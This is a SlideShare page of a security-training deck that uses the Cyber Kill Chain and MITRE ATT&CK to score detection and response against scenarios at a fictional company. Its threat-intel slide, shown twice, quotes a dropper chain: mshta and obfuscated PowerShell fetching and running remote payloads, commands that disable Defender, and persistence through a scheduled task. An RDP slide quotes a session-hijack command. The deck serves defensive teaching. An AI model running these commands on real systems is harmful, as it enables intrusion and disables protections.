Location via proxy:   [ UP ]  
[Report a bug]   [Manage cookies]                
SlideShare a Scribd company logo

How to measure your security response readiness?

T
Tomasz Jakubowski

This presentation will introduce the Lockheed Martin Cyber Kill Chain and MITRE ATT&CK frameworks. By working through 4 different practical scenarios in a fictional company https://sensenet-library.com, the attendees will learn how they can use those frameworks to measure their security response in today's diverse security threat landscape. We'll go through categorising security controls, responding to a vulnerability report, assessing a threat intel report and decide on future of the company's toolset where you will be able to answer a question if you should continue investing in a tool or should you buy a new one.

Related slideshows

Threat Con 2021: What's Hitting my Honeypots
Threat Con 2021: What's Hitting my HoneypotsThreat Con 2021: What's Hitting my Honeypots
Threat Con 2021: What's Hitting my Honeypots
 
External to DA, the OS X Way
External to DA, the OS X WayExternal to DA, the OS X Way
External to DA, the OS X Way
 
Web application security part 01
Web application security part 01Web application security part 01
Web application security part 01
 
1 of 29
Download to read offline
How to measure your security response readiness? Tomasz Jakubowski @perunhimself tomasz@shellsquad.com
Lockheed Martin Cyber Kill Chain® - recap Source: Seven Ways to Apply the Cyber Kill Chain® with a Threat Intelligence Platform https://www.lockheedmartin.com/content/dam/lockheed- martin/rms/documents/cyber/Seven_Ways_to_Apply_the_Cyber_Kill_Chain_with_a_Threat_Intelligence_Platform.pdf
0 10 20 30 40 50 60 Recon Weaponization Delivery Exploitation Installation C&C Actions on objectives Detection vs Closure Detected Closed Close the gap
MITRE ATT&CK ™ • Website: https://attack.mitre.org • Quote: “MITRE ATT&CK™ is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. The ATT&CK knowledge base is used as a foundation for the development of specific threat models and methodologies in the private sector, in government, and in the cybersecurity product and service community.”
MITRE ATT&CK ™ Tactics Techniques • Answers WHY an action is performed by an adversary • Provide useful context to individual techniques • Answers HOW an adversary achieves a tactical objective by performing an action (e.g. send spearphising email with an attachment to gain initial foothold) • Useful information for both red and blue teams MITRE ATT&CK ™ Tactics Techniques • Answers WHY an action is performed by an adversary • Provide useful context to individual techniques • Answers HOW an adversary achieves a tactical objective by performing an action (e.g. send spearphising email with an attachment to gain initial foothold) • Useful information for both red and blue teams
MITRE ATT&CK ™ Source: https://attack.mitre.org/theme/images/enterprise-pre-lifecycle.png
How to measure your security response readiness?
What is described • Tactics (E: 12) • Techniques (E: 266) • Description • Examples: Groups and/or software using this technique • Mitigation • Detection • References • Groups (94) • Description • Aliases • Techniques used • Software used • References • Software (414) • Description • Techniques used • Groups using it • References
There are just too many techniques! Shortlist! eg. Industry > Groups > Techniques
MITRE ATT&CK™ toolset • MITRE ATT&CK™ Navigator https://mitre-attack.github.io/attack-navigator/enterprise/
The “Target” • Fictional company (or maybe not) https://www.sensenet-library.com • Provides services available online • AI constructs – they just live in cyberspace • it’s critical for them to be online! • Construct – a copy of consciousness allowing for immortal life in cyberspace • Keeps confidential data on their internal network • You don’t want people breaking in and making copies of customers’ constructs
ROUTERFIREWALLFIREWALL SWITCH MAILWWW SWITCH INTERNET NIDSNAV DBSIEM SVR USER1 USER3USER2 USER4 PROXY On Host: - FW - AV - IDS
Warm-up: Detection and Containment Phase Detect Deny Disrupt Degrade Deceive Contain Reconnaissance Firewall Honeypot Weaponization NIPS Delivery Exploitation AV Installation Command & Control AV Actions on Targets LMCyberKillChain® Countermeasures
Completed: Detection and Containment Phase Detect Deny Disrupt Degrade Deceive Contain Reconnaissance Web Analytics Web logs Router Logs NIDS Firewall Honeypot Redirect Loop Honeypot Redirect Loops Firewall Weaponization NIDS NIPS NIPS Delivery NIDS HIDS AV Web Filter Mail Filter Inline AV Mail Filter Web Filter Queuing Sinkhole Combination of Deny/Disrupt Honeypot App-Aware Firewall Honeypot Exploitation HIDS NIDS AV Patch AV HIPS Patch AV HIPS Highly restricted User Accounts Honeypot Inter-Zone NIPS Installation HIDS Application Logs AV NetFlow App Whitelisting Blocked Execution AV HIPS Combination of Deny/Disrupt Honeypot Command & Control NIDS HIDS AV Firewall Sinkhole NIPS DEP Sinkhole Tarpit Sinkhole DNS Redirect Sinkhole Actions on Targets Audit Logs DEP AV NIDS HIDS Firewall Network Segmentation DLP Network Segmentation HIPS Network Segmentation Honeypot LMCyberKillChain® Countermeasures
Scenario 1: OMG! New vulnerability • CVE-2029-0708 – Online Surrogate Service Remote Code Execution • A remote code execution vulnerability exists in Online Surrogate Services when an unauthenticated attacker connects to the target system using RDP and sends specially crafted requests. This vulnerability requires no user interaction. An attacker who successfully exploited this vulnerability could execute arbitrary code on the target surrogate that can lead to complete takeover of the surrogate. • To exploit this vulnerability, an attacker would need to send a specially crafted request to the target surrogate Online Surrogate Service via RDP. • The update addresses the vulnerability by correcting how Online Surrogate Services handles connection requests. • You’ve checked – you have an old version of the software and you can’t patch right now due to some other dependencies that need to be sorted out first Publicly Disclosed Proof of Concept Exploited Latest Software Release Older Software Release Denial of Service Yes Yes Yes 4 – Not affected 1 – Exploitation More Likely No
Source: https://mitre-attack.github.io/attack-navigator/enterprise/
T1076: Remote Desktop Protocol • Mitigation • Disable the RDP service if it is unnecessary, • remove unnecessary accounts and groups from Remote Desktop Users groups, • enable firewall rules to block RDP traffic between network security zones, • Audit the Remote Desktop Users group membership regularly, • Remove the local Administrators group from the list of groups allowed to log in through RDP, • Limit remote user permissions if remote access is necessary, • Use remote desktop gateways and multifactor authentication for remote logins, • Do not leave RDP accessible from the internet, • Change GPOs to define shorter timeouts sessions and maximum amount of time any single session can be active, • Change GPOs to specify the maximum amount of time that a disconnected session stays active on the RD session host server, • Detection • Use of RDP may be legitimate, depending on the network environment and how it is used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior with RDP, • Monitor for user accounts logged into systems they would not normally access or access patterns to multiple systems over a relatively short period of time. • set up process monitoring for tscon.exe usage and monitor service creation that uses cmd.exe /k or cmd.exe /c in its arguments to prevent RDP session hijacking (e.g.: sc create sesshijack binpath= “cmd.exe /k tscon 4 /dest:console” and then: net start sesshijack) https://attack.mitre.org/techniques/T1076/ Groups using it: 16 Software using it: 8
• Multi-Stage Backdoor Dropper Document Possibly Targeting Online Services Vendors Observed • 1st stage: Dropper Document after enabling VBA macros executes mshta.exe with the following command line: mshta.exe http://www.tinyurl[.]com/shlsqd • The referenced TinyURL address redirects to https://www.faild2ptch[.]com/oh/no.html, which provides URL-escaped JavaScript (JS) that performs the following actions: 1. Removes OS Defender dynamic signatures using the following command line: MpCmdRun.exe-removedefinitions- dynamicsignatures 2. Kills all open Office applications using the following command line: taskkill /f /im winword.exe & taskkill /f /im excel.exe & taskkill /f /im MSPUB.exe & taskkill /f /im POWERPNT.EXE 3. Kills the OS Defender notification process using the command line: taskkill /f /im MSASCuiL.exe 4. Disables unsafe files being opened in protected view by writing to one of the following registry paths: HKCUSoftwareMicrosoftOffice[11- 16].0[Excel|Word|PowerPoint]SecurityProtectedViewDisableUnsafeLocationsInPV 5. Downloads and executes a remotely hosted .NET PE https://pastebin[.]com/raw/dhVymUy3 using PowerShell executed by mshta.exe with the following command line: mshta.exe vbscript:CreateObject(Wscript.Shell).Run(powershell.exe -noexit - command [Reflection.Assembly]::Load([System.Convert]::FromBase64String((New- ObjectNet.WebClient).DownloadString('h'+'t'+'t'+'p'+'s:'+'//p'+'a'+'s'+'t'+'e'+'b'+'i'+'n'+'.'+'c'+'o'+'m (window.close) 6. Creates a registry run key under HKCUSoftwareMicrosoftWindowsCurrentVersionRunMicrosoftUpdate with the following command line to execute a scheduled task every 100 minutes to download and execute a remote payload using mshta.exe: schtasks /create /sc MINUTE /mo 100 /tn "eScan Backup" /tr "mshta vbscript:CreateObject("Wscript.Shell").Run("mshta.exe https://pastebin[.]com/raw/df861P8c",0,true)(window.close)"" /F Scenario 2: Threat Intel Report
• Multi-Stage Backdoor Dropper Document Possibly Targeting Online Services Vendors Observed • 1st stage: Dropper Document after enabling VBA macros executes mshta.exe with the following command line: mshta.exe http://www.tinyurl[.]com/shlsqd • The referenced TinyURL address redirects to https://www.faild2ptch[.]com/oh/no.html, which provides URL-escaped JavaScript (JS) that performs the following actions: 1. Removes OS Defender dynamic signatures using the following command line: MpCmdRun.exe-removedefinitions- dynamicsignatures 2. Kills all open Office applications using the following command line: taskkill /f /im winword.exe & taskkill /f /im excel.exe & taskkill /f /im MSPUB.exe & taskkill /f /im POWERPNT.EXE 3. Kills the OS Defender notification process using the command line: taskkill /f /im MSASCuiL.exe 4. Disables unsafe files being opened in protected view by writing to one of the following registry paths: HKCUSoftwareMicrosoftOffice[11- 16].0[Excel|Word|PowerPoint]SecurityProtectedViewDisableUnsafeLocationsInPV 5. Downloads and executes a remotely hosted .NET PE https://pastebin[.]com/raw/dhVymUy3 using PowerShell executed by mshta.exe with the following command line: mshta.exe vbscript:CreateObject(Wscript.Shell).Run(powershell.exe -noexit - command [Reflection.Assembly]::Load([System.Convert]::FromBase64String((New- ObjectNet.WebClient).DownloadString('h'+'t'+'t'+'p'+'s:'+'//p'+'a'+'s'+'t'+'e'+'b'+'i'+'n'+'.'+'c'+'o'+'m (window.close) 6. Creates a registry run key under HKCUSoftwareMicrosoftWindowsCurrentVersionRunMicrosoftUpdate with the following command line to execute a scheduled task every 100 minutes to download and execute a remote payload using mshta.exe: schtasks /create /sc MINUTE /mo 100 /tn "eScan Backup" /tr "mshta vbscript:CreateObject("Wscript.Shell").Run("mshta.exe https://pastebin[.]com/raw/df861P8c",0,true)(window.close)"" /F Scenario 2: Threat Intel Report T1193: Spearphishing Attachment T1089: Disabling Security Tools T1170: MshtaT1481: Web Service T1053: Scheduled Task T1027: Obfuscated Files or Information T1064: Scripting T1086: PowerShell T1112: Modify Registry
How to measure your security response readiness?
Maturity 0 = We do nothing 1 = Locally logged Relevant data is captured on the endpoint 2 = Centrally logged Data is gathered centrally 4 = Alerting We have rules to detect anomalies, suspicious events 5 = Playbook exists A process to respond exists (incl. analyse, contain, eradicate, recover) 6 = Response is automated We have automated response for this alert 3 = Correlated / enriched Logs for the event are enriched with data from other sources to increase fidelity
6 = Response is automated 5 = Playbook exists 4 = Alerting 3 = Correlated / enriched 2 = Centrally logged 1 = Locally logged 0 = We do nothing
Scenario 3: It’s all about the money • There is an ongoing trade war between 2 biggest economies in the world • Unfortunately this has an impact on the wealthiest people who are Sense//Net Library’s customers • Few of them decided to put their AI constructs to sleep until better times come hence your profits decrease • The management decided it’s time to cut costs and your department needs to participate • You don’t want to cut people – they are a great team – so you focus on vendor contracts that are going to be renewed this year – which security control can you afford to get rid of?
Measure effectiveness of the toolset MITRE ATT&CK techniques Current Early warning Inbound Protect Detect Outbound Protect Reconnaisance Weaponization, Delivery Weaponization, Delivery, C2 Exploit, Installation, C2, AOO Tool1 Tool2 Tool3 Tool4 Tool5 Tool6 Tool7 Tool8 T1193: Spearphishing Attachment T1089: Disabling Security Tools T1112: Modify Registry T1086: PowerShell T1053: Scheduled Task Source: Seven Ways to Apply the Cyber Kill Chain® with a Threat Intelligence Platform https://www.lockheedmartin.com/content/dam/lockheed-martin/rms/documents/cyber/Seven_Ways_to_Apply_the_Cyber_Kill_Chain_with_a_Threat_Intelligence_Platform.pdf [2] Would Warn of Activity [0] N/A [2] Would Block Activity [1] Could Block Activity [0] Would Not Block Activity [2] Would Detect Activity [0] No Detection or N/A [2] Would Block Outbound Traffic [1] Could Have Blocked [0] Would Not Block Activity Shortlisted Techniques
Measure effectiveness of the toolset MITRE ATT&CK techniques Current Toolset measure Early warning Inbound Protect Detect Outbound Protect Reconnaisance Weaponization, Delivery Weaponization, Delivery, C2 Exploit, Installation, C2, AOO Tool1 Tool2 Tool3 Tool4 Tool5 Tool6 Tool7 Tool8 Current Proposed T1193: Spearphishing Attachment 0 0 2 1 2 0 2 1 8 7 T1089: Disabling Security Tools 2 0 0 2 2 0 2 1 9 8 T1112: Modify Registry 0 0 2 1 2 0 2 1 8 7 T1086: PowerShell 2 0 0 2 2 0 2 1 9 8 T1053: Scheduled Task 2 0 2 1 0 2 2 1 10 7 44 37 100% 84% Source: Seven Ways to Apply the Cyber Kill Chain® with a Threat Intelligence Platform https://www.lockheedmartin.com/content/dam/lockheed-martin/rms/documents/cyber/Seven_Ways_to_Apply_the_Cyber_Kill_Chain_with_a_Threat_Intelligence_Platform.pdf [2] Would Warn of Activity [0] N/A [2] Would Block Activity [1] Could Block Activity [0] Would Not Block Activity [2] Would Detect Activity [0] No Detection or N/A [2] Would Block Outbound Traffic [1] Could Have Blocked [0] Would Not Block Activity
Scenario 4: Let’s go shopping • Times are changing and the company profits picked up • You successfully argued to get a bigger budget and now you can spend some money on a new security control • Your team shortlisted a few vendors and you’ve conducted a PoC • The results are that there a few differences in the products • The procurement team negotiated almost similar prices for the products
Measure effectiveness of the toolset MITRE ATT&CK techniques Current Future Toolset measure Early warning Inbound Protect Detect Outbound Protect Proposed Reconnaisance Weaponization, Delivery Weaponization, Delivery, C2 Exploit, Installation, C2, AOO Tool1 Tool2 Tool3 Tool4 Tool5 Tool6 Tool7 Tool8 ToolA ToolB Current ProposedA ProposedB T1193: Spearphishing Attachment 0 2 1 2 2 2 0 7 9 7 T1089: Disabling Security Tools 2 0 2 2 2 0 2 8 8 10 T1112: Modify Registry 0 2 1 2 2 2 0 7 9 7 T1086: PowerShell 2 0 2 2 2 0 0 8 8 8 T1053: Scheduled Task 2 2 1 0 2 2 0 7 9 7 37 43 39 100% 116% 105% 44 43 39 100% 98% 89% Source: Seven Ways to Apply the Cyber Kill Chain® with a Threat Intelligence Platform https://www.lockheedmartin.com/content/dam/lockheed-martin/rms/documents/cyber/Seven_Ways_to_Apply_the_Cyber_Kill_Chain_with_a_Threat_Intelligence_Platform.pdf [2] Would Warn of Activity [0] N/A [2] Would Block Activity [1] Could Block Activity [0] Would Not Block Activity [2] Would Detect Activity [0] No Detection or N/A [2] Would Block Outbound Traffic [1] Could Have Blocked [0] Would Not Block Activity [2] Proposal Applicable [0] N/A Previous compared to Proposed A and B
Other use cases Source: https://attack.mitre.org/docs/attack_roadmap.pdf
Putting it all together Vulnerability reports Threat Intel reports Toolset effectiveness Response maturity ...

More Related Content

What's hot

Threat Con 2021: What's Hitting my Honeypots
Threat Con 2021: What's Hitting my HoneypotsThreat Con 2021: What's Hitting my Honeypots
Threat Con 2021: What's Hitting my Honeypots
APNIC
 
External to DA, the OS X Way
External to DA, the OS X WayExternal to DA, the OS X Way
External to DA, the OS X Way
Stephan Borosh
 
Web application security part 01
Web application security part 01Web application security part 01
Web application security part 01
G Prachi
 
BlueHat v17 || All Your Cloud Are Belong to Us; Hunting Compromise in Azure
BlueHat v17 || All Your Cloud Are Belong to Us; Hunting Compromise in Azure BlueHat v17 || All Your Cloud Are Belong to Us; Hunting Compromise in Azure
BlueHat v17 || All Your Cloud Are Belong to Us; Hunting Compromise in Azure
BlueHat Security Conference
 
The Dark Side of PowerShell by George Dobrea
The Dark Side of PowerShell by George DobreaThe Dark Side of PowerShell by George Dobrea
The Dark Side of PowerShell by George Dobrea
EC-Council
 
3. APTs Presentation
3. APTs Presentation3. APTs Presentation
3. APTs Presentation
isc2-hellenic
 
Integrated Tools in OSSIM
Integrated Tools in OSSIMIntegrated Tools in OSSIM
Integrated Tools in OSSIM
AlienVault
 
MITRE ATT&CKcon 2018: ATT&CK as a Teacher, Travis Smith, Tripwire
MITRE ATT&CKcon 2018: ATT&CK as a Teacher, Travis Smith, TripwireMITRE ATT&CKcon 2018: ATT&CK as a Teacher, Travis Smith, Tripwire
MITRE ATT&CKcon 2018: ATT&CK as a Teacher, Travis Smith, Tripwire
MITRE - ATT&CKcon
 
technical overview - endpoint protection 10.3.3
technical overview - endpoint protection 10.3.3technical overview - endpoint protection 10.3.3
technical overview - endpoint protection 10.3.3
Muhammad Denis Iqbal
 
Web application security part 02
Web application security part 02Web application security part 02
Web application security part 02
G Prachi
 
DDoS Attacks
DDoS AttacksDDoS Attacks
DDoS Attacks
Jignesh Patel
 
Lateral Movement - Phreaknik 2016
Lateral Movement - Phreaknik 2016Lateral Movement - Phreaknik 2016
Lateral Movement - Phreaknik 2016
Xavier Ashe
 
Lateral Movement: How attackers quietly traverse your Network
Lateral Movement: How attackers quietly traverse your NetworkLateral Movement: How attackers quietly traverse your Network
Lateral Movement: How attackers quietly traverse your Network
EC-Council
 
Defcon 22-tim-mcguffin-one-man-shop
Defcon 22-tim-mcguffin-one-man-shopDefcon 22-tim-mcguffin-one-man-shop
Defcon 22-tim-mcguffin-one-man-shop
Priyanka Aash
 
CSW2017 chuanda ding_state of windows application security
CSW2017 chuanda ding_state of windows application securityCSW2017 chuanda ding_state of windows application security
CSW2017 chuanda ding_state of windows application security
CanSecWest
 
Web App Security Presentation by Ryan Holland - 05-31-2017
Web App Security Presentation by Ryan Holland - 05-31-2017Web App Security Presentation by Ryan Holland - 05-31-2017
Web App Security Presentation by Ryan Holland - 05-31-2017
TriNimbus
 
Advanced Client Side Exploitation Using BeEF
Advanced Client Side Exploitation Using BeEFAdvanced Client Side Exploitation Using BeEF
Advanced Client Side Exploitation Using BeEF
1N3
 
Sigma Hall of Fame - EU ATT&CK User Workshop, October 2021
Sigma Hall of Fame - EU ATT&CK User Workshop, October 2021Sigma Hall of Fame - EU ATT&CK User Workshop, October 2021
Sigma Hall of Fame - EU ATT&CK User Workshop, October 2021
Florian Roth
 
(130216) #fitalk potentially malicious ur ls
(130216) #fitalk potentially malicious ur ls(130216) #fitalk potentially malicious ur ls
(130216) #fitalk potentially malicious ur ls
INSIGHT FORENSIC
 
CNIT 128 8. Android Implementation Issues (Part 3)
CNIT 128 8. Android Implementation Issues (Part 3)CNIT 128 8. Android Implementation Issues (Part 3)
CNIT 128 8. Android Implementation Issues (Part 3)
Sam Bowne
 

What's hot (20)

Threat Con 2021: What's Hitting my Honeypots
Threat Con 2021: What's Hitting my HoneypotsThreat Con 2021: What's Hitting my Honeypots
Threat Con 2021: What's Hitting my Honeypots
 
External to DA, the OS X Way
External to DA, the OS X WayExternal to DA, the OS X Way
External to DA, the OS X Way
 
Web application security part 01
Web application security part 01Web application security part 01
Web application security part 01
 
BlueHat v17 || All Your Cloud Are Belong to Us; Hunting Compromise in Azure
BlueHat v17 || All Your Cloud Are Belong to Us; Hunting Compromise in Azure BlueHat v17 || All Your Cloud Are Belong to Us; Hunting Compromise in Azure
BlueHat v17 || All Your Cloud Are Belong to Us; Hunting Compromise in Azure
 
The Dark Side of PowerShell by George Dobrea
The Dark Side of PowerShell by George DobreaThe Dark Side of PowerShell by George Dobrea
The Dark Side of PowerShell by George Dobrea
 
3. APTs Presentation
3. APTs Presentation3. APTs Presentation
3. APTs Presentation
 
Integrated Tools in OSSIM
Integrated Tools in OSSIMIntegrated Tools in OSSIM
Integrated Tools in OSSIM
 
MITRE ATT&CKcon 2018: ATT&CK as a Teacher, Travis Smith, Tripwire
MITRE ATT&CKcon 2018: ATT&CK as a Teacher, Travis Smith, TripwireMITRE ATT&CKcon 2018: ATT&CK as a Teacher, Travis Smith, Tripwire
MITRE ATT&CKcon 2018: ATT&CK as a Teacher, Travis Smith, Tripwire
 
technical overview - endpoint protection 10.3.3
technical overview - endpoint protection 10.3.3technical overview - endpoint protection 10.3.3
technical overview - endpoint protection 10.3.3
 
Web application security part 02
Web application security part 02Web application security part 02
Web application security part 02
 
DDoS Attacks
DDoS AttacksDDoS Attacks
DDoS Attacks
 
Lateral Movement - Phreaknik 2016
Lateral Movement - Phreaknik 2016Lateral Movement - Phreaknik 2016
Lateral Movement - Phreaknik 2016
 
Lateral Movement: How attackers quietly traverse your Network
Lateral Movement: How attackers quietly traverse your NetworkLateral Movement: How attackers quietly traverse your Network
Lateral Movement: How attackers quietly traverse your Network
 
Defcon 22-tim-mcguffin-one-man-shop
Defcon 22-tim-mcguffin-one-man-shopDefcon 22-tim-mcguffin-one-man-shop
Defcon 22-tim-mcguffin-one-man-shop
 
CSW2017 chuanda ding_state of windows application security
CSW2017 chuanda ding_state of windows application securityCSW2017 chuanda ding_state of windows application security
CSW2017 chuanda ding_state of windows application security
 
Web App Security Presentation by Ryan Holland - 05-31-2017
Web App Security Presentation by Ryan Holland - 05-31-2017Web App Security Presentation by Ryan Holland - 05-31-2017
Web App Security Presentation by Ryan Holland - 05-31-2017
 
Advanced Client Side Exploitation Using BeEF
Advanced Client Side Exploitation Using BeEFAdvanced Client Side Exploitation Using BeEF
Advanced Client Side Exploitation Using BeEF
 
Sigma Hall of Fame - EU ATT&CK User Workshop, October 2021
Sigma Hall of Fame - EU ATT&CK User Workshop, October 2021Sigma Hall of Fame - EU ATT&CK User Workshop, October 2021
Sigma Hall of Fame - EU ATT&CK User Workshop, October 2021
 
(130216) #fitalk potentially malicious ur ls
(130216) #fitalk potentially malicious ur ls(130216) #fitalk potentially malicious ur ls
(130216) #fitalk potentially malicious ur ls
 
CNIT 128 8. Android Implementation Issues (Part 3)
CNIT 128 8. Android Implementation Issues (Part 3)CNIT 128 8. Android Implementation Issues (Part 3)
CNIT 128 8. Android Implementation Issues (Part 3)
 

Similar to How to measure your security response readiness?

Breach and attack simulation tools
Breach and attack simulation toolsBreach and attack simulation tools
Breach and attack simulation tools
Bangladesh Network Operators Group
 
Workshop on BackTrack live CD
Workshop on BackTrack live CDWorkshop on BackTrack live CD
Workshop on BackTrack live CD
amiable_indian
 
Kunal - Introduction to BackTrack - ClubHack2008
Kunal - Introduction to BackTrack - ClubHack2008Kunal - Introduction to BackTrack - ClubHack2008
Kunal - Introduction to BackTrack - ClubHack2008
ClubHack
 
Kunal - Introduction to backtrack - ClubHack2008
Kunal - Introduction to backtrack - ClubHack2008Kunal - Introduction to backtrack - ClubHack2008
Kunal - Introduction to backtrack - ClubHack2008
ClubHack
 
CyberCrime in the Cloud and How to defend Yourself
CyberCrime in the Cloud and How to defend Yourself CyberCrime in the Cloud and How to defend Yourself
CyberCrime in the Cloud and How to defend Yourself
Alert Logic
 
Web application vulnerability assessment
Web application vulnerability assessmentWeb application vulnerability assessment
Web application vulnerability assessment
Ravikumar Paghdal
 
metaploit framework
metaploit frameworkmetaploit framework
metaploit framework
Le Quyen
 
Secure coding guidelines
Secure coding guidelinesSecure coding guidelines
Secure coding guidelines
Zakaria SMAHI
 
Secure your web app presentation
Secure your web app presentationSecure your web app presentation
Secure your web app presentation
Frans Lytzen
 
Avoiding Application Attacks: A Guide to Preventing the OWASP Top 10 from Hap...
Avoiding Application Attacks: A Guide to Preventing the OWASP Top 10 from Hap...Avoiding Application Attacks: A Guide to Preventing the OWASP Top 10 from Hap...
Avoiding Application Attacks: A Guide to Preventing the OWASP Top 10 from Hap...
IBM Security
 
I got 99 trends and a # is all of them
I got 99 trends and a # is all of themI got 99 trends and a # is all of them
I got 99 trends and a # is all of them
Roberto Suggi Liverani
 
FBI & Secret Service- Business Email Compromise Workshop
FBI & Secret Service- Business Email Compromise WorkshopFBI & Secret Service- Business Email Compromise Workshop
FBI & Secret Service- Business Email Compromise Workshop
Ernest Staats
 
VAPT_FINAL SLIDES.pptx
VAPT_FINAL SLIDES.pptxVAPT_FINAL SLIDES.pptx
VAPT_FINAL SLIDES.pptx
karthikvcyber
 
Offensive cyber security engineer pragram course agenda
Offensive cyber security engineer pragram course agendaOffensive cyber security engineer pragram course agenda
Offensive cyber security engineer pragram course agenda
ShivamSharma909
 
Offensive cyber security engineer updated
Offensive cyber security engineer updatedOffensive cyber security engineer updated
Offensive cyber security engineer updated
InfosecTrain
 
Offensive cyber security engineer
Offensive cyber security engineerOffensive cyber security engineer
Offensive cyber security engineer
ShivamSharma909
 
Secure coding presentation Oct 3 2020
Secure coding presentation Oct 3 2020Secure coding presentation Oct 3 2020
Secure coding presentation Oct 3 2020
Moataz Kamel
 
Catch Me If You Can - Finding APTs in your network
Catch Me If You Can - Finding APTs in your networkCatch Me If You Can - Finding APTs in your network
Catch Me If You Can - Finding APTs in your network
DefCamp
 
Hacker Halted 2014 - Post-Exploitation After Having Remote Access
Hacker Halted 2014 - Post-Exploitation After Having Remote AccessHacker Halted 2014 - Post-Exploitation After Having Remote Access
Hacker Halted 2014 - Post-Exploitation After Having Remote Access
EC-Council
 
Hacking WebApps for fun and profit : how to approach a target?
Hacking WebApps for fun and profit : how to approach a target?Hacking WebApps for fun and profit : how to approach a target?
Hacking WebApps for fun and profit : how to approach a target?
Yassine Aboukir
 

Similar to How to measure your security response readiness? (20)

Breach and attack simulation tools
Breach and attack simulation toolsBreach and attack simulation tools
Breach and attack simulation tools
 
Workshop on BackTrack live CD
Workshop on BackTrack live CDWorkshop on BackTrack live CD
Workshop on BackTrack live CD
 
Kunal - Introduction to BackTrack - ClubHack2008
Kunal - Introduction to BackTrack - ClubHack2008Kunal - Introduction to BackTrack - ClubHack2008
Kunal - Introduction to BackTrack - ClubHack2008
 
Kunal - Introduction to backtrack - ClubHack2008
Kunal - Introduction to backtrack - ClubHack2008Kunal - Introduction to backtrack - ClubHack2008
Kunal - Introduction to backtrack - ClubHack2008
 
CyberCrime in the Cloud and How to defend Yourself
CyberCrime in the Cloud and How to defend Yourself CyberCrime in the Cloud and How to defend Yourself
CyberCrime in the Cloud and How to defend Yourself
 
Web application vulnerability assessment
Web application vulnerability assessmentWeb application vulnerability assessment
Web application vulnerability assessment
 
metaploit framework
metaploit frameworkmetaploit framework
metaploit framework
 
Secure coding guidelines
Secure coding guidelinesSecure coding guidelines
Secure coding guidelines
 
Secure your web app presentation
Secure your web app presentationSecure your web app presentation
Secure your web app presentation
 
Avoiding Application Attacks: A Guide to Preventing the OWASP Top 10 from Hap...
Avoiding Application Attacks: A Guide to Preventing the OWASP Top 10 from Hap...Avoiding Application Attacks: A Guide to Preventing the OWASP Top 10 from Hap...
Avoiding Application Attacks: A Guide to Preventing the OWASP Top 10 from Hap...
 
I got 99 trends and a # is all of them
I got 99 trends and a # is all of themI got 99 trends and a # is all of them
I got 99 trends and a # is all of them
 
FBI & Secret Service- Business Email Compromise Workshop
FBI & Secret Service- Business Email Compromise WorkshopFBI & Secret Service- Business Email Compromise Workshop
FBI & Secret Service- Business Email Compromise Workshop
 
VAPT_FINAL SLIDES.pptx
VAPT_FINAL SLIDES.pptxVAPT_FINAL SLIDES.pptx
VAPT_FINAL SLIDES.pptx
 
Offensive cyber security engineer pragram course agenda
Offensive cyber security engineer pragram course agendaOffensive cyber security engineer pragram course agenda
Offensive cyber security engineer pragram course agenda
 
Offensive cyber security engineer updated
Offensive cyber security engineer updatedOffensive cyber security engineer updated
Offensive cyber security engineer updated
 
Offensive cyber security engineer
Offensive cyber security engineerOffensive cyber security engineer
Offensive cyber security engineer
 
Secure coding presentation Oct 3 2020
Secure coding presentation Oct 3 2020Secure coding presentation Oct 3 2020
Secure coding presentation Oct 3 2020
 
Catch Me If You Can - Finding APTs in your network
Catch Me If You Can - Finding APTs in your networkCatch Me If You Can - Finding APTs in your network
Catch Me If You Can - Finding APTs in your network
 
Hacker Halted 2014 - Post-Exploitation After Having Remote Access
Hacker Halted 2014 - Post-Exploitation After Having Remote AccessHacker Halted 2014 - Post-Exploitation After Having Remote Access
Hacker Halted 2014 - Post-Exploitation After Having Remote Access
 
Hacking WebApps for fun and profit : how to approach a target?
Hacking WebApps for fun and profit : how to approach a target?Hacking WebApps for fun and profit : how to approach a target?
Hacking WebApps for fun and profit : how to approach a target?
 

Recently uploaded

Bài tập tiếng anh lớp 9 - Ôn tập tuyển sinh
Bài tập tiếng anh lớp 9 - Ôn tập tuyển sinhBài tập tiếng anh lớp 9 - Ôn tập tuyển sinh
Bài tập tiếng anh lớp 9 - Ôn tập tuyển sinh
NguynThNhQunh59
 
SCREENING OF RECOMBINANTS - BLUE AND WHITE SCREENING (MCQS)
SCREENING OF RECOMBINANTS - BLUE AND WHITE SCREENING (MCQS)SCREENING OF RECOMBINANTS - BLUE AND WHITE SCREENING (MCQS)
SCREENING OF RECOMBINANTS - BLUE AND WHITE SCREENING (MCQS)
sabaridaran1310
 
Epicor Kinetic REST API Services Overview.pptx
Epicor Kinetic REST API Services Overview.pptxEpicor Kinetic REST API Services Overview.pptx
Epicor Kinetic REST API Services Overview.pptx
Piyush Khalate
 
Generative AI technology is a fascinating field that focuses on creating comp...
Generative AI technology is a fascinating field that focuses on creating comp...Generative AI technology is a fascinating field that focuses on creating comp...
Generative AI technology is a fascinating field that focuses on creating comp...
Nohoax Kanont
 
Mega MUG 2024: Working smarter in Marketo
Mega MUG 2024: Working smarter in MarketoMega MUG 2024: Working smarter in Marketo
Mega MUG 2024: Working smarter in Marketo
Stephanie Tyagita
 
FIDO Munich Seminar Workforce Authentication Case Study.pptx
FIDO Munich Seminar Workforce Authentication Case Study.pptxFIDO Munich Seminar Workforce Authentication Case Study.pptx
FIDO Munich Seminar Workforce Authentication Case Study.pptx
FIDO Alliance
 
Using ScyllaDB for Real-Time Write-Heavy Workloads
Using ScyllaDB for Real-Time Write-Heavy WorkloadsUsing ScyllaDB for Real-Time Write-Heavy Workloads
Using ScyllaDB for Real-Time Write-Heavy Workloads
ScyllaDB
 
Top keywords searches on business in AUS
Top keywords searches on business in AUSTop keywords searches on business in AUS
Top keywords searches on business in AUS
riannecreativetwo
 
Flame Atomic Emission Spectroscopy.-pptx
Flame Atomic Emission Spectroscopy.-pptxFlame Atomic Emission Spectroscopy.-pptx
Flame Atomic Emission Spectroscopy.-pptx
VaishnaviChavan206944
 
Network Auto Configuration and Correction using Python.pptx
Network Auto Configuration and Correction using Python.pptxNetwork Auto Configuration and Correction using Python.pptx
Network Auto Configuration and Correction using Python.pptx
saikumaresh2
 
UiPath Community Day Amsterdam presentations
UiPath Community Day Amsterdam presentationsUiPath Community Day Amsterdam presentations
UiPath Community Day Amsterdam presentations
UiPathCommunity
 
Understanding NFT Marketplace Ecosystem.pptx
Understanding NFT Marketplace Ecosystem.pptxUnderstanding NFT Marketplace Ecosystem.pptx
